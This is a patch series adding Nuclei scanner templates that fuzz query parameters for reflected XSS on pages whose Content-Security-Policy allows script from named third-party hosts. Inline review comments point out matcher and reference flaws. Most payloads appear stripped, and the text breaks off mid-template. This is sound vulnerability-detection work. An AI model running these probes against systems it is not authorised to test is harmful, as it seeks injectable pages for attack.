From a9326d9f0f18893d5b084d3ead54c5c6efd7602e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 24 Jan 2025 16:58:18 +0530 Subject: [PATCH 01/10] Create youtube-csp-xss.yaml --- .../xss/csp/youtube-csp-xss.yaml | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml new file mode 100644 index 00000000000..215f995b85c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml @@ -0,0 +1,48 @@ +id: youtube-csp-xss + +info: + name: Content-Security-Policy Bypass via Youtube + author: DhiyaneshDK + severity: high + reference: + - https://infosecwriteups.com/riding-the-waves-of-api-versioning-unmasking-a-stored-xss-vulnerability-bypassing-csp-using-c039c10df2b1 + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L206C17-L206C89 + metadata: + verified: true + tags: xss,csp-bypass,youtube + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "www.youtube.com" + - "script-src" + condition: and From 9b93b40c1a447bd7f0ba15a18905c38a0211e3bc Mon Sep 17 00:00:00 2001 
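Review bot: The CSP matcher at the end of this hunk tests `www.youtube.com` and `script-src` as two independent substrings of the whole Content-Security-Policy value, so a policy that lists YouTube only under `frame-src` or `img-src` and has an unrelated `script-src` still satisfies `condition: and`, while a policy that allows `*.youtube.com` or `https://youtube.com` in `script-src` is missed. A single regex matcher scoped to the directive avoids both, e.g. `- type: regex` / `part: content_security_policy` / `regex: - 'script-src[^;]*youtube\.com'` (the `[^;]*` also covers `script-src-elem`). The same three-matcher shape is repeated in every template of this series (360cn, gstatic, meteoprog, sogou, virtualearth, amazon, google, googleapis, ovoenergy, pixplug, servicenow, fwmrm, mi, aliexpress, lpsnmedia, digitalocean, google-accounts, tiktok-analytics, youku), so the change applies to each of them with its own host.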
From: Dhiyaneshwaran Date: Mon, 27 Jan 2025 15:48:23 +0530 Subject: [PATCH 02/10] Added 5 csp bypass --- .../xss/csp/360cn-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/gstatic-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/meteoprog-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/sogou-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/virtualearth-csp-xss.yaml | 47 +++++++++++++++++++ 5 files changed, 235 insertions(+) create mode 100644 dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml new file mode 100644 index 00000000000..a55fd8da551 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml @@ -0,0 +1,47 @@ +id: 360cn-csp-xss + +info: + name: Content-Security-Policy Bypass via 360.cn + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L208C19-L208C106 + metadata: + verified: true + tags: xss,csp-bypass,360cn + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "360.cn" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml new file mode 100644 index 00000000000..28f1e94d860 --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml @@ -0,0 +1,47 @@ +id: gstatic-csp-xss + +info: + name: Content-Security-Policy Bypass via Gstatic + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L196C17-L196C169 + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - "" + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "www.gstatic.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml new file mode 100644 index 00000000000..c9ac2664e1c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml @@ -0,0 +1,47 @@ +id: meteoprog-csp-xss + +info: + name: Content-Security-Policy Bypass via Meteoprog + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L193C18-L193C120 + metadata: + verified: true + tags: xss,csp-bypass,meteoprog + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "meteoprog.ua" + - "script-src" + condition: and \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml new file mode 100644 index 00000000000..930b2ad6d13 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml @@ -0,0 +1,47 @@ +id: sogou-csp-xss + +info: + name: Content-Security-Policy Bypass via Sogou + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21 + metadata: + verified: true + tags: xss,csp-bypass,sogou + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "sogou.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml new file mode 100644 index 00000000000..c285f081a3c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml 
@@ -0,0 +1,47 @@ +id: virtualearth-csp-xss + +info: + name: Content-Security-Policy Bypass via Virtualearth + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21 + metadata: + verified: true + tags: xss,csp-bypass,virtualearth + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "virtualearth.net" + - "script-src" + condition: and \ No newline at end of file From 4d13d991360541d96c68bb96eb351cfaa79ada7e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 Jan 2025 16:35:59 +0530 Subject: [PATCH 03/10] 6 New CSP Bypass --- .../xss/csp/amazon-csp-xss.yaml | 47 +++++++++++++++++ .../xss/csp/google-csp-xss.yaml | 51 +++++++++++++++++++ .../xss/csp/googleapis-csp-xss.yaml | 51 +++++++++++++++++++ .../xss/csp/ovoenergy-csp-xss.yaml | 47 +++++++++++++++++ .../xss/csp/pixplug-csp-xss.yaml | 46 +++++++++++++++++ .../xss/csp/servicenow-csp-xss.yaml | 47 +++++++++++++++++ 6 files changed, 289 insertions(+) create mode 100644 dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml new file mode 100644 index 00000000000..8cbb277d68c --- /dev/null 
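Review bot: The reference in this hunk, `data.tsv#L210C1-L210C21`, is the identical line fragment cited by sogou-csp-xss.yaml earlier in this patch, so one of the two links is a copy-paste slip and the virtualearth entry should cite the row that actually lists `virtualearth.net`. The link is what backs `verified: true` and `severity: high` for this template, so it is worth fixing before merge; the replacement should keep the commit-pinned form used elsewhere, `- https://github.com/honoki/CSPBypass/blob/<commit>/data.tsv#L<row>` with the real values filled in.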
+++ b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml @@ -0,0 +1,47 @@ +id: amazon-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L132C9-L132C15 + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "amazon.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml new file mode 100644 index 00000000000..02c19fa6916 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml 
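Review bot: As rendered here the `injection` list under `payloads:` holds a bare `-` with no value, which YAML reads as null rather than a string; if the payload text was stripped in rendering this is moot, but if the file really ships this way the body matcher `words: - "{{injection}}"` is comparing against a null payload and the template cannot detect anything. The same bare entry appears in servicenow-csp-xss.yaml later in this patch, and patch 06 adds a second one to this file. Every other template in the series quotes its payload (`- ''`), so at minimum the entries here should be quoted strings so a linter or safe loader sees the intent.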
@@ -0,0 +1,51 @@ +id: google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L186 + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L187 + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - "" + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "google.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml new file mode 100644 index 00000000000..da72ae1874d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml 
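Review bot: The `google.com` word in the CSP matcher is a plain substring, so it also fires for `accounts.google.com`, which receives its own template (google-accounts-csp-xss.yaml) later in this series; a host whose `script-src` allows only `accounts.google.com` would then yield two findings for one condition. If the two cited data.tsv rows are specifically about the bare or `www.` host, a regex anchored at the start of the host token keeps the templates disjoint, e.g. `- type: regex` / `part: content_security_policy` / `regex: - 'script-src[^;]*[\s/](\*\.|www\.)?google\.com'`; otherwise the overlap should be noted in the accounts template so triage can de-duplicate.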
@@ -0,0 +1,51 @@ +id: googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via GoogleAPIS + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L188 + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L189C5-L189C19 + metadata: + verified: true + tags: xss,csp-bypass,googleapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "googleapis.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml new file mode 100644 index 00000000000..05d1b99a9c9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml @@ -0,0 +1,47 @@ +id: ovoenergy-csp-xss + +info: + name: Content-Security-Policy Bypass via OvoEnergy + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L99C1-L99C29 + metadata: + verified: true + tags: xss,csp-bypass,ovoenergy + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "ovoenergy.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml new file mode 100644 index 00000000000..41d9793617f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml @@ -0,0 +1,46 @@ +id: pixplug-csp-xss + +info: + name: Content-Security-Policy Bypass via PixPlug + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L174C20-L174C106 + metadata: + verified: true + tags: xss,csp-bypass,pixplug + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "pixplug.in" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml new file mode 100644 index 00000000000..8263d6499f7 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml 
@@ -0,0 +1,47 @@ +id: servicenow-csp-xss + +info: + name: Content-Security-Policy Bypass via ServiceNow + author: DhiyaneshDK + severity: high + reference: + - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L101C25-L101C234 + metadata: + verified: true + tags: xss,csp-bypass,servicenow + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "service-now.com" + - "script-src" + condition: and \ No newline at end of file From e975d761bf20c922bfc9ea383c489c64e974f3b6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 Jan 2025 18:27:15 +0530 Subject: [PATCH 04/10] fix-payload --- dast/vulnerabilities/xss/csp/google-csp-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml index 02c19fa6916..b6fc118d668 100644 --- a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml @@ -19,15 +19,15 @@ http: payloads: injection: + - '' - "" - - '' fuzzing: - part: query type: replace mode: single fuzz: - - "{{injection}}" + - "{{url_encode(injection)}}" stop-at-first-match: true From b826dc46b4c740e51ad348d42d57a9a0e3524470 Mon Sep 17 00:00:00 2001 
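Review bot: The switch to `{{url_encode(injection)}}` in this hunk fixes only google-csp-xss.yaml; the templates created in patches 01–03 (youtube, 360cn, gstatic, meteoprog, sogou, virtualearth, googleapis, ovoenergy, pixplug, servicenow) still place the raw `{{injection}}` in the query, and only amazon is brought in line later in patch 06. An unencoded payload containing spaces, angle brackets or `#` is not a valid query component, so those templates would silently never see their reflection and report nothing. The same one-line change under `fuzz:`, `- "{{url_encode(injection)}}"`, should be applied to each of them in this series rather than left for a follow-up. The payload reorder in this hunk is harmless given `stop-at-first-match: true`, but it changes which payload is tried first and so which one appears in the finding.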
From: Dhiyaneshwaran Date: Mon, 27 Jan 2025 18:37:17 +0530 Subject: [PATCH 05/10] few more csp bypass incoming --- .../xss/csp/fwmrm-csp-xss.yaml | 47 +++++++++++++++++++ dast/vulnerabilities/xss/csp/mi-csp-xss.yaml | 47 +++++++++++++++++++ 2 files changed, 94 insertions(+) create mode 100644 dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/mi-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml new file mode 100644 index 00000000000..d6d09a10b0a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml @@ -0,0 +1,47 @@ +id: fwmrm-csp-xss + +info: + name: Content-Security-Policy Bypass via FreeWheel + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L2C19-L2C113 + metadata: + verified: true + tags: xss,csp-bypass,fwmrm + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "fwmrm.net" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml new file mode 100644 index 00000000000..94a7b8fc922 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml 
@@ -0,0 +1,47 @@ +id: mi-csp-xss + +info: + name: Content-Security-Policy Bypass via Mi + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L3 + metadata: + verified: true + tags: xss,csp-bypass,mi + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "mi.com" + - "script-src" + condition: and \ No newline at end of file From c02d565baf6707c98991ed6f6d8d675be4c62a3a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 Jan 2025 19:58:23 +0530 Subject: [PATCH 06/10] additional templates --- .../xss/csp/aliexpress-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/amazon-csp-xss.yaml | 8 +++- .../xss/csp/lpsnmedia-csp-xss.yaml | 47 +++++++++++++++++++ 3 files changed, 100 insertions(+), 2 deletions(-) create mode 100644 dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml new file mode 100644 index 00000000000..81c57a63570 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml 
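Review bot: `mi.com` as a word matcher is a substring test, so any CSP whose value mentions a host that merely ends in the letters `mi.com` matches; it is the shortest host string in this series and the one most prone to false positives, especially combined with `script-src` being checked independently. A word boundary in a regex matcher avoids that: `- type: regex` / `part: content_security_policy` / `regex: - 'script-src[^;]*\bmi\.com'`.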
@@ -0,0 +1,47 @@ +id: aliexpress-csp-xss + +info: + name: Content-Security-Policy Bypass via AliExpress + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L4C5-L4C19 + metadata: + verified: true + tags: xss,csp-bypass,aliexpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "aliexpress.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml index 8cbb277d68c..2c6a6cfb7f2 100644 --- a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml @@ -5,7 +5,8 @@ info: author: DhiyaneshDK severity: high reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L132C9-L132C15 + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L136 + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L5C19-L5C100 metadata: verified: true tags: xss,csp-bypass,amazon @@ -19,13 +20,16 @@ http: payloads: injection: - + - fuzzing: - part: query type: replace mode: single fuzz: - - "{{injection}}" + - "{{url_encode(injection)}}" + + stop-at-first-match: true matchers-condition: and matchers: diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml new file mode 100644 index 00000000000..b649f234783 --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml @@ -0,0 +1,47 @@ +id: lpsnmedia-csp-xss + +info: + name: Content-Security-Policy Bypass via Lpsnmedia + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L6C7-L6C16 + metadata: + verified: true + tags: xss,csp-bypass,lpsnmedia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "lpsnmedia.net" + - "script-src" + condition: and \ No newline at end of file From bf060b27cbe8256b404e840853f4ad0dd339d7e2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Jan 2025 05:48:08 +0530 Subject: [PATCH 07/10] Additional CSP Bypass --- .../xss/csp/digitalocean-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/google-accounts-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/tiktok-analytics-csp-xss.yaml | 47 +++++++++++++++++++ .../xss/csp/youku-csp-xss.yaml | 47 +++++++++++++++++++ 4 files changed, 188 insertions(+) create mode 100644 dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml new file mode 100644 index 00000000000..58696b4a0e8 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml 
@@ -0,0 +1,47 @@ +id: digitalocean-csp-xss + +info: + name: Content-Security-Policy Bypass via DigitalOcean Anchor + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L12C25-L12C151 + metadata: + verified: true + tags: xss,csp-bypass,digitalocean + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "anchor.digitalocean.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml new file mode 100644 index 00000000000..443dc670aa3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml @@ -0,0 +1,47 @@ +id: google-accounts-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Accounts + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L7C21-L7C109 + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "accounts.google.com" + - "script-src" + condition: and \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml new file mode 100644 index 00000000000..639b8af052c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml @@ -0,0 +1,47 @@ +id: tiktok-analytics-csp-xss + +info: + name: Content-Security-Policy Bypass via TikTok Analytics + author: DhiyaneshDK + severity: high + reference: + - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L11C22-L11C115 + metadata: + verified: true + tags: xss,csp-bypass,tiktok + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + + - type: word + part: content_type + words: + - "text/html" + + - type: word + part: content_security_policy + words: + - "analytics.tiktok.com" + - "script-src" + condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml new file mode 100644 index 00000000000..46995f26343 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml 
@@ -0,0 +1,47 @@
+id: youku-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Youku ACS
+ author: DhiyaneshDK
+ severity: high
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youku
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+
+ - type: word
